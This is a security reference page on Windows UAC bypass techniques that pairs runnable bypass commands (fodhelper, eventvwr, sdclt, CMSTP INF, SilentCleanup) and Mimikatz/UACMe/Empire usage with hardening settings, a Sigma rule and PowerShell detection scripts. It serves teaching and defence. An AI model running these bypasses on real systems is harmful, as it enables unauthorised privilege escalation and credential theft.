High Severity | T1548.002
🔓 UAC Bypass Techniques
🧠 Description
User Account Control (UAC) is the Windows mechanism that runs members of the local Administrators group with a filtered, medium-integrity token and asks for consent before handing out the full, high-integrity one. UAC bypass techniques abuse implementation flaws in Windows components (auto-elevating binaries, elevated COM objects, privileged scheduled tasks) to obtain high-integrity execution without the consent prompt. Two caveats shape everything below: the attacker must already run as a user who is in Administrators (a standard user has no elevated token to unlock, so none of these techniques apply to them), and Microsoft does not treat UAC as a security boundary, so bypasses are often fixed slowly or not at all.
Why UAC Bypass Works:
- Auto-Elevation: Microsoft-signed binaries in trusted directories (System32, Program Files) whose manifest declares autoElevate=true elevate silently at the default UAC level, so controlling what they load or launch yields high-integrity execution
- DLL Hijacking: an auto-elevated process loads a DLL by name from a location the user can write to, or from a spoofed trusted directory
- Registry Exploitation: auto-elevated binaries, and the elevated mmc.exe or DllHost they spawn, resolve shell verbs, App Paths and COM classes through HKCU\Software\Classes before HKLM, and HKCU is writable at medium integrity
- Token Manipulation: elevated COM objects (IFileOperation is the classic one) accept calls from a process that looks like a trusted Windows binary, and the token of an already-elevated process can be duplicated to launch a new high-integrity process
UAC Integrity Levels:
- Low: Internet Explorer Protected Mode and other sandboxed apps
- Medium: standard user processes, and the filtered token of an administrator in Admin Approval Mode
- High: administrator processes after UAC consent or auto-elevation
- System: NT AUTHORITY\SYSTEM services
🔍 UAC Enumeration
Check Current UAC Status:
```cmd
:: UAC policy values (EnableLUA=1 means UAC on; ConsentPromptBehaviorAdmin=2 plus PromptOnSecureDesktop=1 is "Always notify")
REG QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System

:: LocalAccountTokenFilterPolicy: 1 = remote UAC token filtering disabled (local admins get a full token over the network); 0 or absent = filtered (default)
REG QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy

:: FilterAdministratorToken: 1 = the built-in Administrator (RID 500) also runs in Admin Approval Mode; 0 or absent = it always gets a full token
REG QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v FilterAdministratorToken

:: Is the current user a local admin? A bypass only helps if the answer is yes
net user %username%
whoami /groups | findstr /i Admin

:: Current integrity level (Medium = filtered admin token, High = already elevated)
whoami /all | findstr Mandatory
```
Check Auto-Elevate Applications:
```cmd
:: Auto-elevation is declared in a binary's embedded manifest (<autoElevate>true</autoElevate>), not in
:: Image File Execution Options. Dump the manifest with Sysinternals sigcheck:
sigcheck64.exe -m C:\Windows\System32\fodhelper.exe | findstr /i autoElevate

:: Writable directories on the system PATH are DLL/EXE search-order hijack candidates
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v Path
icacls C:\Windows\Temp
icacls %TEMP%

:: Scheduled tasks that run with highest privileges: the DiskCleanup SilentCleanup task shows
:: RunLevel HighestAvailable and a %windir%-based command (see technique 5 below)
schtasks /query /tn "\Microsoft\Windows\DiskCleanup\SilentCleanup" /xml | findstr /i "RunLevel Command Arguments"
```
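The manifest check above, done across a whole directory, as an added PowerShell example (not code from the original page). It assumes what holds for Windows' own binaries: the RT_MANIFEST resource is stored as plain, uncompressed XML inside the PE, so a byte-level regex finds it without calling the resource APIs. `Get-AutoElevateBinary` is a name chosen for this example.

```powershell
# Added example: list executables whose embedded manifest declares <autoElevate>true</autoElevate>.
# A binary only actually auto-elevates if it is also Microsoft-signed and sits in a trusted directory
# (System32, Program Files), which is why the signature status is reported alongside the name.
function Get-AutoElevateBinary {
    [CmdletBinding()]
    param(
        [string]$Directory = "$env:SystemRoot\System32",
        [string]$Filter = '*.exe'
    )
    $autoElevate = [regex]'<autoElevate>\s*true\s*</autoElevate>'
    $execLevel   = [regex]'requestedExecutionLevel\s+level="([^"]+)"'

    Get-ChildItem -Path $Directory -Filter $Filter -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            try {
                $bytes = [System.IO.File]::ReadAllBytes($_.FullName)
            } catch {
                return   # locked or access denied; skip it
            }
            # The manifest is ASCII XML; non-ASCII bytes become '?' and never match the patterns.
            $text = [System.Text.Encoding]::ASCII.GetString($bytes)
            if ($autoElevate.IsMatch($text)) {
                $m = $execLevel.Match($text)
                [pscustomobject]@{
                    Name   = $_.Name
                    Level  = if ($m.Success) { $m.Groups[1].Value } else { 'n/a' }
                    Signed = (Get-AuthenticodeSignature -FilePath $_.FullName).Status
                    Path   = $_.FullName
                }
            }
        }
}

# Usage: on a stock Windows 10/11 install fodhelper.exe and eventvwr.exe are among the hits.
Get-AutoElevateBinary | Sort-Object Name | Format-Table -AutoSize
```

Two things this does not cover: auto-elevating COM classes (registered under HKLM\Software\Classes\CLSID with an Elevation subkey, not a manifest), and binaries whose manifest lives in an external `.manifest` file. Both are rare for System32 but worth remembering when a target is missing from the list.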
💣 Bypass Techniques
1. fodhelper.exe (Registry Key Manipulation):
```cmd
:: fodhelper.exe (System32, autoElevate) opens the ms-settings: protocol through the shell. The shell consults
:: HKCU\Software\Classes before HKLM, so the medium-integrity user decides what command runs. The empty
:: DelegateExecute value is required; without it the shell ignores the command.
REG ADD "HKCU\Software\Classes\ms-settings\Shell\Open\command" /ve /d "cmd.exe" /f
REG ADD "HKCU\Software\Classes\ms-settings\Shell\Open\command" /v "DelegateExecute" /t REG_SZ /d "" /f
:: Launch the auto-elevated binary; the payload runs at high integrity
fodhelper.exe
:: Cleanup
REG DELETE "HKCU\Software\Classes\ms-settings" /f
```
Caveats: this does nothing at the "Always notify" UAC level (fodhelper then prompts like anything else), and the HKCU write is a well-known signature for Defender and EDR, so expect the registry write itself to be flagged.
2. sdclt.exe (Backup and Restore, App Paths Lookup):
```cmd
:: sdclt.exe (autoElevate) launched control.exe by looking it up under the per-user App Paths key,
:: so whoever controls HKCU chose the binary. Fixed in later Windows 10 releases; check before relying on it.
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /ve /d "cmd.exe" /f
:: Optional: App Paths "Path" is prepended to the launched process's PATH
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /v "Path" /d "C:\Windows\System32" /f
:: Execute
sdclt.exe
:: Cleanup
REG DELETE "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
```
3. eventvwr.exe (mscfile Handler Hijack):
```cmd
:: eventvwr.exe is in System32 and auto-elevates; confirm the path and that you cannot write there
where eventvwr.exe
icacls C:\Windows\System32\eventvwr.exe
:: It starts mmc.exe with eventvwr.msc, and mmc resolves the .msc handler through
:: HKCU\Software\Classes\mscfile\shell\open\command before HKCR, so a user-writable key redirects it.
:: Fixed in Windows 10 1703, so this only works on older builds.
REG ADD "HKCU\Software\Classes\mscfile\shell\open\command" /ve /d "cmd.exe" /f
eventvwr.exe
:: Cleanup
REG DELETE "HKCU\Software\Classes\mscfile" /f
```
Note that dropping a DLL into C:\Windows\System32 is not a bypass: writing there already requires the high-integrity token you are trying to obtain. DLL hijacks against auto-elevated binaries need a search-path location the user can write to.
4. CMSTP.exe (INF File):
```ini
; Save as %TEMP%\uac.inf and run:  cmstp.exe /au %TEMP%\uac.inf
; cmstp.exe auto-elevates; RunPreSetupCommands run before the profile dialog appears, and the
; taskkill line closes cmstp before the user ever sees it.
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall]
CustomDestination=CustInstDestSectionAllUsers
RunPreSetupCommands=RunPreSetupCommandsSection

[RunPreSetupCommandsSection]
c:\windows\system32\cmd.exe
taskkill /IM cmstp.exe /F

[CustInstDestSectionAllUsers]
49000,49001=AllUSer_LDIDSection, 7

[AllUSer_LDIDSection]
"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", ""

[Strings]
ServiceName="CorpVPN"
ShortSvcName="CorpVPN"
```
5. DiskCleanup SilentCleanup Scheduled Task (%windir% Environment Variable):
```cmd
:: The task \Microsoft\Windows\DiskCleanup\SilentCleanup runs as the logged-on user with RunLevel
:: HighestAvailable and its action is %windir%\system32\cleanmgr.exe /autoclean /d %systemdrive%.
:: %windir% is expanded from the user's environment, and HKCU\Environment is user-writable, so the
:: task launches whatever %windir% points at. The trailing "REM " turns the rest of the line into a comment.
REG ADD HKCU\Environment /v windir /t REG_SZ /d "cmd.exe /k REM " /f
:: Start the task on demand; an elevated cmd.exe appears
schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
:: Cleanup (leaving windir set breaks the user's environment)
REG DELETE HKCU\Environment /v windir /f
```
Check first that the task still exists and still references %windir% (the schtasks /xml query in the enumeration section shows this); the task definition has changed across Windows 10 builds.
🔐 Using Known UAC Bypass Tools
Mimikatz Bypass Module:
```cmd
:: Mimikatz has no UAC bypass of its own: its privilege and token commands assume you already run at
:: high integrity. Use it from the shell a bypass above gives you.
:: privilege::debug needs SeDebugPrivilege, which only the elevated token carries;
:: token::elevate then impersonates a SYSTEM token (high integrity to SYSTEM);
:: token::elevate /domainadmin impersonates a domain-admin token if one is present on the host.
mimikatz.exe "privilege::debug" "token::elevate" "exit"
mimikatz.exe "privilege::debug" "token::elevate /domainadmin" "exit"
```
UACME Tool:
```cmd
:: UACMe (hfiref0x) implements dozens of numbered bypass methods. The README table maps each
:: number to its target binary, technique, and the Windows build where Microsoft fixed it.
:: Download from GitHub: hxxps://github.com/hfiref0x/UACME
:: Method 33 is the fodhelper.exe registry variant shown above; the default payload is an elevated cmd.exe
Akagi64.exe 33
:: Pass your own payload as the second argument
Akagi64.exe 33 C:\Windows\System32\cmd.exe
```
Pick the method number from the README for the target build; the compiled binary is heavily signatured, so in an engagement you normally rebuild it.
Empire/Covenant:
```
# Empire: the privesc modules wrap the same techniques (fodhelper, eventvwr, ...)
usemodule powershell/privesc/bypassuac_fodhelper
set Listener http
execute

# Covenant: the BypassUACCommand and BypassUACGrunt tasks run a command or a new Grunt at high integrity
BypassUACGrunt <LauncherName>
```
🛡️ Defense Against UAC Bypass
Disable Auto-Elevation:
```powershell
# Auto-elevation of Windows binaries only happens at the default level (ConsentPromptBehaviorAdmin = 5).
# Setting "Always notify" makes fodhelper/eventvwr-style bypasses show a prompt instead of elevating silently.
# GPO: Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies >
#      Security Options > User Account Control: Behavior of the elevation prompt for administrators in
#      Admin Approval Mode = "Prompt for consent on the secure desktop"
$k = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
Set-ItemProperty -Path $k -Name "EnableLUA" -Value 1                   # UAC on (takes effect after reboot)
Set-ItemProperty -Path $k -Name "ConsentPromptBehaviorAdmin" -Value 2  # always prompt for consent, never auto-elevate
Set-ItemProperty -Path $k -Name "PromptOnSecureDesktop" -Value 1       # prompt on the secure desktop
Set-ItemProperty -Path $k -Name "EnableInstallerDetection" -Value 1    # installer heuristics; unrelated to auto-elevation but keep it on
```
Remove Users from Local Admin Group:
```powershell
# Best defense: the day-to-day account is not a local administrator, so there is no elevated token to unlock
Remove-LocalGroupMember -Group "Administrators" -Member "DOMAIN\User"
# Separate account used only when elevation is actually needed
Add-LocalGroupMember -Group "Administrators" -Member "DOMAIN\SpecialAdmin"
# Keep remote UAC token filtering on: 0 (the default) means local admin accounts only get a filtered token over the network
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 0 /f
```
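The policy values queried in the enumeration section and set in the hardening steps above, read and interpreted in one place, as an added PowerShell example (not code from the original page). It is the same check whether you are deciding if a bypass will work or verifying that a host has been hardened; `Test-UacPolicy` is a name chosen for this example, and the defaults assumed for absent values are the ones Windows applies.

```powershell
# Added example: read the UAC policy keys and say what they mean for auto-elevation.
function Test-UacPolicy {
    [CmdletBinding()]
    param([string]$Path = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System')

    $p = Get-ItemProperty -Path $Path -ErrorAction Stop
    # Windows' own defaults apply when a value is absent
    $enableLua   = if ($null -ne $p.EnableLUA)                    { [int]$p.EnableLUA }                    else { 1 }
    $consent     = if ($null -ne $p.ConsentPromptBehaviorAdmin)   { [int]$p.ConsentPromptBehaviorAdmin }   else { 5 }
    $secureDesk  = if ($null -ne $p.PromptOnSecureDesktop)        { [int]$p.PromptOnSecureDesktop }        else { 1 }
    $tokenFilter = if ($null -ne $p.LocalAccountTokenFilterPolicy) { [int]$p.LocalAccountTokenFilterPolicy } else { 0 }
    $filterRid500 = if ($null -ne $p.FilterAdministratorToken)    { [int]$p.FilterAdministratorToken }     else { 0 }

    $consentText = @{
        0 = 'elevate without prompting (UAC effectively off for admins)'
        1 = 'prompt for credentials on the secure desktop'
        2 = 'prompt for consent on the secure desktop ("Always notify")'
        3 = 'prompt for credentials'
        4 = 'prompt for consent'
        5 = 'prompt for consent for non-Windows binaries (default; manifested Windows binaries auto-elevate)'
    }

    # Manifested Windows binaries auto-elevate only at level 5 with UAC on; at level 0 or with
    # EnableLUA=0 everything elevates silently and no bypass is needed at all.
    $autoElevate     = ($enableLua -eq 1) -and ($consent -eq 5)
    $silentElevation = ($enableLua -eq 0) -or ($consent -eq 0)

    [pscustomobject]@{
        EnableLUA                     = $enableLua
        ConsentPromptBehaviorAdmin    = "$consent : $($consentText[$consent])"
        PromptOnSecureDesktop         = $secureDesk
        LocalAccountTokenFilterPolicy = "$tokenFilter : " + $(if ($tokenFilter -eq 1) { 'remote UAC filtering DISABLED (local admins get a full token over the network)' } else { 'remote UAC filtering enabled (default)' })
        FilterAdministratorToken      = "$filterRid500 : " + $(if ($filterRid500 -eq 1) { 'built-in Administrator also runs in Admin Approval Mode' } else { 'built-in Administrator always gets a full token' })
        AutoElevationActive           = $autoElevate
        Verdict                       = if ($silentElevation) { 'UAC disabled or silent: no bypass needed' }
                                        elseif ($autoElevate) { 'Default level: auto-elevate bypasses (fodhelper, eventvwr, ...) apply' }
                                        else                  { 'Always notify or credential prompt: auto-elevate bypasses will prompt' }
    }
}

# Usage
Test-UacPolicy | Format-List
```

Reading the key needs no privileges, so this runs at medium integrity on the target as well as from a hardening audit. `AutoElevationActive` is the one field that decides whether the registry-based techniques in this page are even worth attempting.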
🔍 Detection
Sysmon Event Monitoring:
Monitor for UAC bypass artifacts with Sysmon:
- Event ID 1 (process create): a child of fodhelper.exe, sdclt.exe, eventvwr.exe or cleanmgr.exe that is not the child it normally launches (eventvwr.exe launches mmc.exe, sdclt.exe launches control.exe, fodhelper.exe launches nothing). The child carries IntegrityLevel High while no consent.exe ran, and the auto-elevated parent was itself started from explorer.exe or a user shell rather than from the Settings app
- Event ID 13 (registry value set): writes under HKCU\Software\Classes\ms-settings, HKCU\Software\Classes\mscfile, HKCU\...\App Paths\control.exe and HKCU\Environment\windir. Sysmon only records these if the configuration includes those keys
- Event ID 11 (file create): an .inf written to a user directory followed shortly by a cmstp.exe process create
Sigma Rules:
```yaml
title: UAC Bypass via Registry
id: uac-bypass-registry
status: experimental
logsource:
  product: windows
  category: registry_set
detection:
  selection:
    TargetObject|contains:
      - '\Software\Classes\ms-settings\Shell\Open\command'
      - '\Software\Classes\mscfile\shell\open\command'
      - '\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe'
      - '\Environment\windir'
  condition: selection
falsepositives:
  - Applications that legitimately register an ms-settings or mscfile handler (rare)
level: high
```
Matching on 'Software\Classes' alone, as a first draft of this rule did, fires on every per-user file-association write and drowns the signal; match the specific handler keys the bypasses need.
PowerShell Detection:
```powershell
# Hijacked handler keys that the fodhelper, eventvwr and sdclt variants leave behind (normally absent in HKCU)
Get-ItemProperty "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -ErrorAction SilentlyContinue
Get-ItemProperty "HKCU:\Software\Classes\mscfile\shell\open\command" -ErrorAction SilentlyContinue
Get-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" -ErrorAction SilentlyContinue
# Any per-user shell\open\command override is worth reading
Get-ItemProperty "HKCU:\Software\Classes\*\shell\open\command" -ErrorAction SilentlyContinue
# SilentCleanup variant: a user-level windir overrides the system one for that scheduled task
Get-ItemProperty "HKCU:\Environment" -Name windir -ErrorAction SilentlyContinue
# New autorun entries (persistence planted from the elevated shell)
Get-CimInstance -ClassName Win32_StartupCommand | Select-Object Name, Command, Location
```
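The Sysmon and Sigma logic from this section applied to a few constructed events, as an added PowerShell example (not code from the original page). The events are hashtables standing in for what `Get-WinEvent` returns from the Sysmon operational log, built inline so the function runs offline; `Find-UacBypassIndicator` and the sample SID are names made up for the example.

```powershell
# Added example: flag UAC-bypass indicators in Sysmon events.
# Two checks: (1) Event 13 registry writes to the handler keys the bypasses need;
# (2) Event 1 process creates where an auto-elevating binary spawns something other than its normal child.
function Find-UacBypassIndicator {
    param([Parameter(Mandatory)][object[]]$Events)

    # Keys written by the fodhelper (ms-settings), eventvwr (mscfile), sdclt (App Paths) and SilentCleanup (windir) variants
    $suspiciousKeys = @(
        '\Software\Classes\ms-settings\Shell\Open\command',
        '\Software\Classes\mscfile\shell\open\command',
        '\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe',
        '\Environment\windir'
    )
    # Auto-elevating parents and the children they legitimately launch; anything else is suspicious
    $expectedChild = @{
        'fodhelper.exe' = @()
        'eventvwr.exe'  = @('mmc.exe')
        'sdclt.exe'     = @('control.exe')
        'cleanmgr.exe'  = @()
    }

    foreach ($e in $Events) {
        switch ([int]$e.EventID) {
            13 {
                foreach ($k in $suspiciousKeys) {
                    if ($e.TargetObject -like "*$k*") {
                        [pscustomobject]@{ Type = 'RegistryWrite'; Process = $e.Image; Detail = $e.TargetObject; Value = $e.Details }
                    }
                }
            }
            1 {
                $parent = [IO.Path]::GetFileName($e.ParentImage).ToLower()
                $child  = [IO.Path]::GetFileName($e.Image).ToLower()
                if ($expectedChild.ContainsKey($parent) -and ($child -notin $expectedChild[$parent])) {
                    [pscustomobject]@{ Type = 'UnexpectedChild'; Process = $parent; Detail = "$child ($($e.IntegrityLevel))"; Value = $e.CommandLine }
                }
            }
        }
    }
}

# Constructed sample events (not real log data). Sysmon writes HKCU paths as HKU\<SID>\... and the
# default value as \(Default).
$sid = 'S-1-5-21-1111-2222-3333-1001'
$sample = @(
    @{ EventID = 13; Image = 'C:\Windows\System32\reg.exe'; TargetObject = "HKU\$sid\Software\Classes\ms-settings\Shell\Open\command\(Default)"; Details = 'cmd.exe' },
    @{ EventID = 13; Image = 'C:\Windows\System32\reg.exe'; TargetObject = "HKU\$sid\Software\Classes\ms-settings\Shell\Open\command\DelegateExecute"; Details = '' },
    @{ EventID = 1;  Image = 'C:\Windows\System32\cmd.exe'; ParentImage = 'C:\Windows\System32\fodhelper.exe'; CommandLine = 'cmd.exe'; IntegrityLevel = 'High' },
    # benign: eventvwr launching mmc is what it always does
    @{ EventID = 1;  Image = 'C:\Windows\System32\mmc.exe'; ParentImage = 'C:\Windows\System32\eventvwr.exe'; CommandLine = '"C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc"'; IntegrityLevel = 'High' },
    # benign: an ordinary per-user file association
    @{ EventID = 13; Image = 'C:\Program Files\SomeApp\setup.exe'; TargetObject = "HKU\$sid\Software\Classes\.foo\(Default)"; Details = 'foofile' }
)

# Expect three hits: two registry writes and the cmd.exe child of fodhelper.exe
Find-UacBypassIndicator -Events $sample | Format-Table -AutoSize
```

The registry check is only as good as the Sysmon configuration: event 13 is emitted only for keys an include rule covers, so the four paths above need to be in the config before this logic sees anything. The parent/child check works without special configuration because process creates are logged by default.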
💥 Impact
Potential Damage:
- Administrator-Level Access: a bypass yields a high-integrity shell with the user's full admin token; SYSTEM is one more step (a service or PsExec -s started from that shell)
- Credential Dumping: with SeDebugPrivilege usable from the elevated token, LSASS memory and the SAM and SECURITY hives become readable
- Persistence: services, scheduled tasks and HKLM run keys can be created at high integrity
- Defense Evasion: no consent prompt, so the user sees nothing; only process and registry telemetry records the elevation